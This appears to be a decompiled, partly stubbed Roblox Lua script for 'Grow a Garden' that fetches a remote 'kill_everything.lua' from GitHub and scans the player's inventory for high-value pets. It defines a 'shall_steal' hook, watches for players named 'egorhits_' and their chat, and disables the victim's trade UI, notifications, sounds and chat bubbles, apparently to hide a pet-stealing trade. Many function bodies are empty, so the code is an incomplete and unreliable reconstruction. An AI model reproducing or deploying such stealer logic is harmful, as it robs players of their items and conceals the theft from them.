local fenv = getfenv()
local _ = require == require
loadstring("function test() return \"hi\" end")
local _ = require == require
fenv.test = function(...)
end
fenv.thing = function(...)
end
fenv.print = function(...)
end
fenv.warn = function(...)
end
fenv.error = function(...)
end
fenv.info = function(...)
end
string.find(game:HttpGet("https://raw.githubusercontent.com/f4shn/main/refs/heads/main/addons/kill_everything.lua"), "false")

fenv.GAG = function(...)
end
task.wait()
local _ = not game:IsLoaded()
local _callrequire17 = require(game:GetService("ReplicatedStorage").Modules.DataService)
game:GetService("ReplicatedStorage")
local _call21 = game:GetService("SoundService")
game:GetService("RunService")
game:GetService("Stats")
game:GetService("TeleportService")
game:GetService("HttpService")
local _ = workspace.CurrentCamera
game:GetService("VirtualInputManager")
local _LocalPlayer35 = game:GetService("Players").LocalPlayer
local _PlayerGui36 = _LocalPlayer35.PlayerGui
local _Top_Notification37 = _PlayerGui36.Top_Notification
local _Notification38 = _call21.Notification
for _44, _44_2 in pairs(_callrequire17:GetData().PetsData.PetInventory.Data) do
    local _PetType45 = _44_2.PetType
    local _ = _PetType45 ~= "Red Fox"
    local _ = _PetType45 ~= "Chicken Zombie"
    table.find({
        [1] = "Raccoon",
        [2] = "T-Rex",
        [3] = "Fennec Fox",
        [4] = "Dragonfly",
        [5] = "Butterfly",
        [6] = "Disco Bee",
        [7] = "Mimic Octopus",
        [8] = "Queen Bee",
        [9] = "Spinosaurus",
        [10] = "Kitsune",
    }, _PetType45)

end
spawn(function(...)
end)
task.spawn(function(...)
end)
fenv.shall_steal = function(...)
end
game.Players.PlayerAdded:Connect(function(...)
end)
for _60, _60_2 in pairs(game.Players:GetPlayers()) do
    local _Name61 = _60_2.Name
    local _Name64 = game.Players.LocalPlayer.Name
    local _ = _Name61 == _Name64
    local _ = _Name61 == _Name64
    string.find(_60_2.Name:lower(), "egorhits_")
    _60_2.Chatted:Connect(function(...)
    end)
end
spawn(function(...)
end)
local _callrequire80 = require(game:GetService("ReplicatedStorage").Modules.DataService)
local _callrequire96 = require(game:GetService("ReplicatedStorage").Modules.PetServices.PetUtilities)
for _97, _97_2 in pairs(_callrequire80:GetData().PetsData.PetInventory.Data) do
    local _BaseWeight100 = _97_2.PetData.BaseWeight
    local _106, _106_2, _106_3 = math.floor((_callrequire96:CalculateWeight(_BaseWeight100, _97_2.PetData.Level) * 100))
    local _107 = (_106 / 100)
    local _ = _97_2.PetData.BaseWeight >= 5
    local _ = _107 >= 25
    table.find({
        [1] = "Raccoon",
        [2] = "T-Rex",
        [3] = "Fennec Fox",
        [4] = "Dragonfly",
        [5] = "Butterfly",
        [6] = "Disco Bee",
        [7] = "Mimic Octopus",
        [8] = "Queen Bee",
        [9] = "Spinosaurus",
        [10] = "Kitsune",
    }, _97_2.PetType)
    local _ = not require(game.ReplicatedStorage.Data.PetRegistry.PetMutationRegistry).EnumToPetMutation[_97_2.PetData.MutationType]
    for _123, _123_2 in pairs(_LocalPlayer35.Backpack:GetChildren()) do
        local _call125 = _123_2:GetAttribute("PET_UUID")
        local _ = _call125 == _97
        local _ = _call125 == _97
    end
    for _134, _134_2 in pairs(workspace[game.Players.LocalPlayer.Name]:GetChildren()) do
        local _call136 = _134_2:GetAttribute("PET_UUID")
        local _ = _call136 == _97
        local _ = _call136 == _97
    end
    local _Level140 = _97_2.PetData.Level
    local _ = _97_2.PetType
    local _ = 45 <= _Level140
    local _ = 60 <= _Level140
    local _ = 75 <= _Level140
    local _ = 20 <= _Level140
    local _ = 30 <= _Level140
    local _ = 14 < _107
    local _ = _97_2.PetType
end
local _ = game:GetService("RobloxReplicatedStorage"):FindFirstChild("GetServerType"):InvokeServer() == "VIPServer"
local _call162 = game.Players:GetPlayers()
local _ = # _call162
local _ = # _call162
local _call166 = _call21:FindFirstChild("Notification")

_call166.Volume = 0
local _call169 = _PlayerGui36:FindFirstChild("Top_Notification")
local _call171 = _PlayerGui36:FindFirstChild("Trading")

_call171.Enabled = false

_call169.Enabled = false
_Notification38:GetPropertyChangedSignal("Volume"):Connect(function(...)
end)
_Top_Notification37:GetPropertyChangedSignal("Enabled"):Connect(function(...)
end)
local _ExperienceChat184 = game:GetService("CoreGui").ExperienceChat
_ExperienceChat184.Enabled = false
for _191, _191_2 in pairs(game:GetService("CoreGui").ExperienceChat.bubbleChat:GetChildren()) do
    local _ = not _191_2:IsA("BillboardGui")
    _191_2.Enabled = false
end
spawn(function(...)
end)